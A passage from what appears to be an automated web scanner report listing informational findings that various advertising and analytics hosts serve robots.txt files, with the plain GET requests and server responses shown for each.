The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: internetmarketing.localedge.com

Response

HTTP/1.0 200 OK
Date: Sat, 17 Sep 2011 16:36:40 GMT
Server: Apache/2.2.10 (Unix) DAV/2 PHP/5.2.6 mod_jk/1.2.30
X-Powered-By: PHP/5.2.6
X-Pingback: http://internetmarketing.localedge.com/xmlrpc.php
Content-Length: 24
Content-Type: text/plain; charset=utf-8
X-Cache: MISS from wd-44
Via: 1.0 wd-44 (squid/3.1.11)
Connection: close

User-agent: *
Disallow:
24.52. http://load.exelator.com/load/OptOut.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://load.exelator.com
Path:   /load/OptOut.php

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: load.exelator.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Accept-Ranges: bytes
ETag: "3503161682"
Last-Modified: Tue, 15 Apr 2008 16:21:01 GMT
Content-Length: 27
Date: Sat, 17 Sep 2011 16:44:07 GMT
Server: HTTP server
Connection: close
Via: 1.1 AN-AMP_TM uproxy-4

User-agent: *
Disallow: /
24.53. http://loadus.exelator.com/load/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://loadus.exelator.com
Path:   /load/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: loadus.exelator.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Accept-Ranges: bytes
ETag: "1277282803"
Last-Modified: Tue, 15 Apr 2008 16:21:01 GMT
Content-Length: 27
Date: Sat, 17 Sep 2011 16:28:17 GMT
Server: HTTP server
Connection: close
Via: 1.1 AN-AMP_TM uproxy-2

User-agent: *
Disallow: /
24.54. http://login.dotomi.com/ucm/UCMController  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://login.dotomi.com
Path:   /ucm/UCMController

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: login.dotomi.com

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 17:24:02 GMT
Server: Apache/2.2.20 (Unix) mod_ssl/2.2.20 OpenSSL/0.9.8e-fips-rhel5 DAV/2
X-Name: dmc-s02
Last-Modified: Tue, 08 Sep 2009 04:16:43 GMT
ETag: "80cf21e-a2-473093bdbc0c0"
Accept-Ranges: bytes
Content-Length: 162
Connection: close
Content-Type: text/plain

#do not edit this file in ms-platform, you need unix line seperators for it.
#this file will disallow any robots to search the dmc.
User-Agent: *
Disallow: /
24.55. http://metrics.elle.com/b/ss/hcfellegirlprod/1/H.15.1/s92564277239143  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://metrics.elle.com
Path:   /b/ss/hcfellegirlprod/1/H.15.1/s92564277239143

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: metrics.elle.com

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:38:13 GMT
Server: Omniture DC/2.0.0
Last-Modified: Tue, 28 Sep 2010 18:58:27 GMT
ETag: "2d41a7-18-6e161ac0"
Accept-Ranges: bytes
Content-Length: 24
xserver: www622
Keep-Alive: timeout=15
Connection: close
Content-Type: text/plain

User-agent: *
Disallow:
24.56. http://metrics.seattlepi.com/b/ss/hearstseattlepi/1/H.21/s91569553883746  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://metrics.seattlepi.com
Path:   /b/ss/hearstseattlepi/1/H.21/s91569553883746

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: metrics.seattlepi.com

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:23:36 GMT
Server: Omniture DC/2.0.0
Last-Modified: Tue, 28 Sep 2010 18:58:27 GMT
ETag: "d1153-18-6e161ac0"
Accept-Ranges: bytes
Content-Length: 24
xserver: www21
Keep-Alive: timeout=15
Connection: close
Content-Type: text/plain

User-agent: *
Disallow:
24.57. http://nai.ad.us-ec.adtechus.com/nai/daa.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://nai.ad.us-ec.adtechus.com
Path:   /nai/daa.php

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: nai.ad.us-ec.adtechus.com

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:45:28 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Last-Modified: Wed, 25 May 2011 23:56:04 GMT
ETag: "23094c1-5be-4a4227284ed00"
Accept-Ranges: bytes
Content-Length: 1470
Cache-Control: max-age=1209600
Expires: Sat, 01 Oct 2011 16:45:28 GMT
Keep-Alive: timeout=15, max=80
Connection: Keep-Alive
Content-Type: text/plain

#
# robots.txt
#
# This file is to prevent the crawling and indexing of certain parts
# of your site by web crawlers and spiders run by sites like Yahoo!
# and Google. By telling these "robots" where
...[SNIP]...
24.58. http://nai.adserver.adtechus.com/nai/daa.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://nai.adserver.adtechus.com
Path:   /nai/daa.php

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: nai.adserver.adtechus.com

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:45:28 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Last-Modified: Wed, 25 May 2011 23:56:04 GMT
ETag: "23094c1-5be-4a4227284ed00"
Accept-Ranges: bytes
Content-Length: 1470
Cache-Control: max-age=1209600
Expires: Sat, 01 Oct 2011 16:45:28 GMT
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/plain

#
# robots.txt
#
# This file is to prevent the crawling and indexing of certain parts
# of your site by web crawlers and spiders run by sites like Yahoo!
# and Google. By telling these "robots" where
...[SNIP]...
24.59. http://nai.adserverec.adtechus.com/nai/daa.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://nai.adserverec.adtechus.com
Path:   /nai/daa.php

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: nai.adserverec.adtechus.com

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:45:32 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Last-Modified: Wed, 25 May 2011 23:56:04 GMT
ETag: "23094c1-5be-4a4227284ed00"
Accept-Ranges: bytes
Content-Length: 1470
Cache-Control: max-age=1209600
Expires: Sat, 01 Oct 2011 16:45:32 GMT
Keep-Alive: timeout=15, max=98
Connection: Keep-Alive
Content-Type: text/plain

#
# robots.txt
#
# This file is to prevent the crawling and indexing of certain parts
# of your site by web crawlers and spiders run by sites like Yahoo!
# and Google. By telling these "robots" where
...[SNIP]...
24.60. http://nai.adserverwc.adtechus.com/nai/daa.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://nai.adserverwc.adtechus.com
Path:   /nai/daa.php

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: nai.adserverwc.adtechus.com

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:45:50 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Last-Modified: Wed, 25 May 2011 23:56:04 GMT
ETag: "23094c1-5be-4a4227284ed00"
Accept-Ranges: bytes
Content-Length: 1470
Cache-Control: max-age=1209600
Expires: Sat, 01 Oct 2011 16:45:50 GMT
Keep-Alive: timeout=15, max=94
Connection: Keep-Alive
Content-Type: text/plain

#
# robots.txt
#
# This file is to prevent the crawling and indexing of certain parts
# of your site by web crawlers and spiders run by sites like Yahoo!
# and Google. By telling these "robots" where
...[SNIP]...
24.61. http://nai.adsonar.com/nai/daa.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://nai.adsonar.com
Path:   /nai/daa.php

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: nai.adsonar.com

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:45:34 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Last-Modified: Wed, 25 May 2011 23:56:04 GMT
ETag: "23094c1-5be-4a4227284ed00"
Accept-Ranges: bytes
Content-Length: 1470
Cache-Control: max-age=1209600
Expires: Sat, 01 Oct 2011 16:45:34 GMT
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/plain

#
# robots.txt
#
# This file is to prevent the crawling and indexing of certain parts
# of your site by web crawlers and spiders run by sites like Yahoo!
# and Google. By telling these "robots" where
...[SNIP]...
24.62. http://nai.adtech.de/nai/daa.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://nai.adtech.de
Path:   /nai/daa.php

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: nai.adtech.de

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:45:45 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Last-Modified: Wed, 25 May 2011 23:56:04 GMT
ETag: "23094c1-5be-4a4227284ed00"
Accept-Ranges: bytes
Content-Length: 1470
Cache-Control: max-age=1209600
Expires: Sat, 01 Oct 2011 16:45:45 GMT
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/plain

#
# robots.txt
#
# This file is to prevent the crawling and indexing of certain parts
# of your site by web crawlers and spiders run by sites like Yahoo!
# and Google. By telling these "robots" where
...[SNIP]...
24.63. http://nai.advertising.com/nai/daa.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://nai.advertising.com
Path:   /nai/daa.php

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: nai.advertising.com

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:45:35 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Last-Modified: Wed, 25 May 2011 23:56:04 GMT
ETag: "23094c1-5be-4a4227284ed00"
Accept-Ranges: bytes
Content-Length: 1470
Cache-Control: max-age=1209600
Expires: Sat, 01 Oct 2011 16:45:35 GMT
Keep-Alive: timeout=15, max=99
Connection: Keep-Alive
Content-Type: text/plain

#
# robots.txt
#
# This file is to prevent the crawling and indexing of certain parts
# of your site by web crawlers and spiders run by sites like Yahoo!
# and Google. By telling these "robots" where
...[SNIP]...
24.64. http://nai.btrll.com/nai/status  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://nai.btrll.com
Path:   /nai/status

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: nai.btrll.com

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:43:52 GMT
Server: Apache/2.0.63 (Unix)
Last-Modified: Mon, 08 Aug 2011 19:03:54 GMT
ETag: "ffc082-1a-1bbf7a80"
Accept-Ranges: bytes
Content-Length: 26
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /
24.65. http://nai.glb.adtechus.com/nai/daa.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://nai.glb.adtechus.com
Path:   /nai/daa.php

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: nai.glb.adtechus.com

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:45:43 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Last-Modified: Wed, 25 May 2011 23:56:04 GMT
ETag: "23094c1-5be-4a4227284ed00"
Accept-Ranges: bytes
Content-Length: 1470
Cache-Control: max-age=1209600
Expires: Sat, 01 Oct 2011 16:45:43 GMT
Keep-Alive: timeout=15, max=96
Connection: Keep-Alive
Content-Type: text/plain

#
# robots.txt
#
# This file is to prevent the crawling and indexing of certain parts
# of your site by web crawlers and spiders run by sites like Yahoo!
# and Google. By telling these "robots" where
...[SNIP]...
24.66. http://nai.tacoda.at.atwola.com/nai/daa.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://nai.tacoda.at.atwola.com
Path:   /nai/daa.php

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: nai.tacoda.at.atwola.com

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:46:06 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Last-Modified: Wed, 25 May 2011 23:56:04 GMT
ETag: "23094c1-5be-4a4227284ed00"
Accept-Ranges: bytes
Content-Length: 1470
Cache-Control: max-age=1209600
Expires: Sat, 01 Oct 2011 16:46:06 GMT
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/plain

#
# robots.txt
#
# This file is to prevent the crawling and indexing of certain parts
# of your site by web crawlers and spiders run by sites like Yahoo!
# and Google. By telling these "robots" where
...[SNIP]...
24.67. http://o.sa.aol.com/b/ss/aolamn,aolsvc/1/H.21/s96658798141233  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://o.sa.aol.com
Path:   /b/ss/aolamn,aolsvc/1/H.21/s96658798141233

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: o.sa.aol.com

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 17:37:16 GMT
Server: Omniture DC/2.0.0
Last-Modified: Tue, 28 Sep 2010 18:59:57 GMT
ETag: "230654-18-73736540"
Accept-Ranges: bytes
Content-Length: 24
xserver: www277
Keep-Alive: timeout=15
Connection: close
Content-Type: text/plain

User-agent: *
Disallow:
24.68. http://omnituretrack.local.com/b/ss/ic-hulk2010production/1/H.17/s91523811360821  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://omnituretrack.local.com
Path:   /b/ss/ic-hulk2010production/1/H.17/s91523811360821

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: omnituretrack.local.com

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:28:50 GMT
Server: Omniture DC/2.0.0
Last-Modified: Tue, 28 Sep 2010 18:59:57 GMT
ETag: "b114a-18-73736540"
Accept-Ranges: bytes
Content-Length: 24
xserver: www324
Keep-Alive: timeout=15
Connection: close
Content-Type: text/plain

User-agent: *
Disallow:
24.69. http://optout.33across.com/api/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optout.33across.com
Path:   /api/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: optout.33across.com

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:46:28 GMT
Server: Apache
Last-Modified: Fri, 25 Feb 2011 23:38:53 GMT
Accept-Ranges: bytes
Content-Length: 42
Cache-Control: max-age=1209600, proxy-revalidate
Expires: Sat, 01 Oct 2011 16:46:28 GMT
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain; charset=UTF-8

User-Agent: *
Disallow: /
Disallow: /api/
24.70. http://optout.cognitivematch.com/optoutStatus  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optout.cognitivematch.com
Path:   /optoutStatus

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: optout.cognitivematch.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Accept-Ranges: bytes
ETag: W/"81-1304607390000"
Last-Modified: Thu, 05 May 2011 14:56:30 GMT
Content-Type: text/plain
Content-Length: 81
Date: Sat, 17 Sep 2011 16:45:13 GMT
Connection: close

# Disallow robots to index any part of our contents
User-agent: *
Disallow: /
24.71. http://optout.crwdcntrl.net/optout/check.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optout.crwdcntrl.net
Path:   /optout/check.php

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: optout.crwdcntrl.net

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:44:39 GMT
Server: Apache/2.2.8 (CentOS)
Last-Modified: Tue, 14 Dec 2010 16:21:02 GMT
ETag: "2fa0745-1a-4976134e6b780"
Accept-Ranges: bytes
Content-Length: 26
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /
24.72. http://optout.invitemedia.com:9030/check_optout  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optout.invitemedia.com:9030
Path:   /check_optout

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: optout.invitemedia.com

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Sat, 17 Sep 2011 16:44:41 GMT
Content-Type: text/plain
Content-Length: 26

User-agent: *
Disallow: /
24.73. http://optout.media6degrees.com/orbserv/NAIStatus  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optout.media6degrees.com
Path:   /orbserv/NAIStatus

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: optout.media6degrees.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Accept-Ranges: bytes
ETag: W/"36-1307715244000"
Last-Modified: Fri, 10 Jun 2011 14:14:04 GMT
Content-Type: text/plain
Content-Length: 36
Date: Sat, 17 Sep 2011 16:45:11 GMT
Connection: close

# go away
User-agent: *
Disallow: /
24.74. http://optout.mxptint.net/naistatus.ashx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optout.mxptint.net
Path:   /naistatus.ashx

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: optout.mxptint.net

Response

HTTP/1.1 200 OK
Content-Length: 29
Content-Type: text/plain
Last-Modified: Fri, 04 Dec 2009 21:27:35 GMT
Accept-Ranges: bytes
ETag: "c8dd2982875ca1:24f3"
Server: Microsoft-IIS/6.0
Date: Sat, 17 Sep 2011 16:45:09 GMT
Connection: close

...User-agent: *
Disallow: /
24.75. http://origin.chron.com/apps/audit/ads.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://origin.chron.com
Path:   /apps/audit/ads.gif

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: origin.chron.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Accept-Ranges: bytes
ETag: "610811936"
Last-Modified: Mon, 29 Aug 2011 19:19:36 GMT
Content-Length: 857
Connection: close
Date: Sat, 17 Sep 2011 16:23:27 GMT
Server: lighttpd/1.4.28-devel-485M

User-agent: Mediapartners-Google*
Disallow: /edgil/
Disallow: /system/
Disallow: /tmp/
Disallow: /westest/
Disallow: /cgi-bin/AT-HCIsearch.cgi
Disallow: /cs/CDA/openstory.hts
Disallow: /content/intera
...[SNIP]...
24.76. http://p.opt.fimserve.com/nai_check.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://p.opt.fimserve.com
Path:   /nai_check.jsp

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: p.opt.fimserve.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
ETag: W/"26-1205261468000"
Last-Modified: Tue, 11 Mar 2008 18:51:08 GMT
Content-Type: text/plain
Content-Length: 26
Date: Sat, 17 Sep 2011 16:46:09 GMT
Connection: keep-alive

User-agent: *
Disallow: /
24.77. http://pbid.pro-market.net/engine  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pbid.pro-market.net
Path:   /engine

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: pbid.pro-market.net

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: CP="NOI DSP COR NID CURa ADMo TAIa PSAo PSDo OUR SAMo BUS UNI PUR COM NAV INT DEM CNT STA PRE LOC"
ANServer: tapp4.ny
ETag: W/"27-1312809562000"
Last-Modified: Mon, 08 Aug 2011 13:19:22 GMT
Content-Type: text/plain
Content-Length: 27
Date: Sat, 17 Sep 2011 16:43:43 GMT
Connection: close

User-agent: *
Disallow: /

24.78. http://pixel.fetchback.com/serve/fb/optout  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.fetchback.com
Path:   /serve/fb/optout

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: pixel.fetchback.com

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 17:18:37 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Wed, 02 Sep 2009 11:29:17 GMT
Accept-Ranges: bytes
Content-Length: 255
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=UTF-8

##
## Created: June 10th 2007. (nikolas@codesquare.com)
## Updated: November 16th 2007. (nikolas@codesquare.com)
##
##
User-agent: *

Disallow: /reports
Disallow: /dev
Disallow: /tmp
Disallow: /hub
Di
...[SNIP]...
24.79. http://pixel.quantserve.com/api/segments.json  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.quantserve.com
Path:   /api/segments.json

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: pixel.quantserve.com

Response

HTTP/1.0 200 OK
Connection: close
Cache-Control: private, no-transform, must-revalidate, max-age=86400
Expires: Sun, 18 Sep 2011 16:23:09 GMT
Content-Type: text/plain
Content-Length: 26
Date: Sat, 17 Sep 2011 16:23:09 GMT
Server: QS

User-agent: *
Disallow: /
24.80. http://ps2.newsinc.com/players/GetZoneID/90009.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ps2.newsinc.com
Path:   /players/GetZoneID/90009.xml

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: ps2.newsinc.com

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Content-Type: text/plain
Date: Sat, 17 Sep 2011 16:23:15 GMT
ETag: "67481927f221cc1:0"
Last-Modified: Fri, 03 Jun 2011 13:28:40 GMT
NDN-Server: PS05
NDN-SiteVer: 3.2.1
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Content-Length: 28
Connection: Close

User-agent: *
Disallow: /
24.81. http://r.skimresources.com/api/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r.skimresources.com
Path:   /api/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: r.skimresources.com

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Content-Type: text/plain; charset=UTF-8
Date: Sat, 17 Sep 2011 16:38:55 GMT
ETag: "3420163-1a-472b23c677180"
Last-Modified: Thu, 03 Sep 2009 20:29:10 GMT
P3P: policyref="http://skimlinks.com/w3c/p3p.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Server: Apache
Vary: Accept-Encoding
X-SKIM-Hostname: api03.angel.skimlinks.com
Content-Length: 26
Connection: Close

User-agent: *
Disallow: /
24.82. http://r.turn.com/r/optout  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r.turn.com
Path:   /r/optout

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: r.turn.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Content-Type: text/html;charset=UTF-8
Date: Sat, 17 Sep 2011 16:46:16 GMT
Connection: close

User-agent: *
Disallow: /app
Disallow: /server
24.83. http://rad.msn.com/ADSAdClient31.dll  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rad.msn.com
Path:   /ADSAdClient31.dll

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: rad.msn.com

Response

HTTP/1.1 200 OK
Cache-Control: max-age=604800
Content-Type: text/plain
Last-Modified: Fri, 22 Jul 2011 17:49:40 GMT
Accept-Ranges: bytes
ETag: "012e9ba9748cc1:0"
Server: Microsoft-IIS/7.5
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Access-Control-Allow-Origin: *
Date: Sat, 17 Sep 2011 16:27:57 GMT
Connection: keep-alive
Content-Length: 28

User-agent: *
Disallow: /
24.84. http://rt.legolas-media.com/lgrt  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rt.legolas-media.com
Path:   /lgrt

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: rt.legolas-media.com

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:21:25 GMT
Server: Apache
Last-Modified: Fri, 08 Jul 2011 17:46:59 GMT
ETag: "70100-1b-4a7926b978ac0"
Accept-Ranges: bytes
Content-Length: 27
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /

24.85. http://s.xp1.ru4.com/coop  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://s.xp1.ru4.com
Path:   /coop

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: s.xp1.ru4.com

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Date: Sat, 17 Sep 2011 16:46:17 GMT
P3p: policyref="/w3c/p3p.xml", CP="NON DSP COR PSAa OUR STP UNI"
Content-type: text/plain
Last-modified: Fri, 31 Jul 2009 18:32:10 GMT
Content-length: 26
Etag: "1a-4a7338aa"
Accept-ranges: bytes
Connection: close

User-agent: *
Disallow: /
24.86. http://s.ytimg.com/yt/swfbin/cps-vflP_j6Bm.swf  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://s.ytimg.com
Path:   /yt/swfbin/cps-vflP_j6Bm.swf

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: s.ytimg.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Last-Modified: Fri, 27 Aug 2010 02:31:32 GMT
Date: Sat, 17 Sep 2011 16:46:56 GMT
Expires: Sat, 17 Sep 2011 16:46:56 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
Server: sffe
Content-Length: 37
X-XSS-Protection: 1; mode=block

User-Agent: *
Disallow: /
Noindex: /
24.87. http://s0.2mdn.net/666472/Amex_Midas_NoBlackout_728x90.swf  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://s0.2mdn.net
Path:   /666472/Amex_Midas_NoBlackout_728x90.swf

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: s0.2mdn.net

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Last-Modified: Sun, 01 Feb 2009 08:00:00 GMT
Date: Sat, 17 Sep 2011 16:33:28 GMT
Expires: Sun, 18 Sep 2011 16:33:28 GMT
Cache-Control: public, max-age=86400
X-Content-Type-Options: nosniff
Server: sffe
Content-Length: 28
X-XSS-Protection: 1; mode=block

User-agent: *
Disallow: /
24.88. http://safebrowsing-cache.google.com/safebrowsing/rd/ChNnb29nLW1hbHdhcmUtc2hhdmFyEAEYz9oDINjaAyoFWO0AAAEyBk_tAAD_AQ  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://safebrowsing-cache.google.com
Path:   /safebrowsing/rd/ChNnb29nLW1hbHdhcmUtc2hhdmFyEAEYz9oDINjaAyoFWO0AAAEyBk_tAAD_AQ

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: safebrowsing-cache.google.com

Response

HTTP/1.0 200 OK
Vary: Accept-Encoding
Content-Type: text/plain
Last-Modified: Tue, 06 Sep 2011 05:52:07 GMT
Date: Sat, 17 Sep 2011 16:41:06 GMT
Expires: Sat, 17 Sep 2011 16:41:06 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block

User-agent: *
Disallow: /search
Disallow: /groups
Disallow: /images
Disallow: /catalogs
Disallow: /catalogues
Disallow: /news
Allow: /news/directory
Disallow: /nwshp
Disallow: /setnewsprefs?
Disallow:
...[SNIP]...
24.89. http://safebrowsing.clients.google.com/safebrowsing/gethash  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://safebrowsing.clients.google.com
Path:   /safebrowsing/gethash

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: safebrowsing.clients.google.com

Response

HTTP/1.0 200 OK
Vary: Accept-Encoding
Content-Type: text/plain
Last-Modified: Tue, 06 Sep 2011 05:52:07 GMT
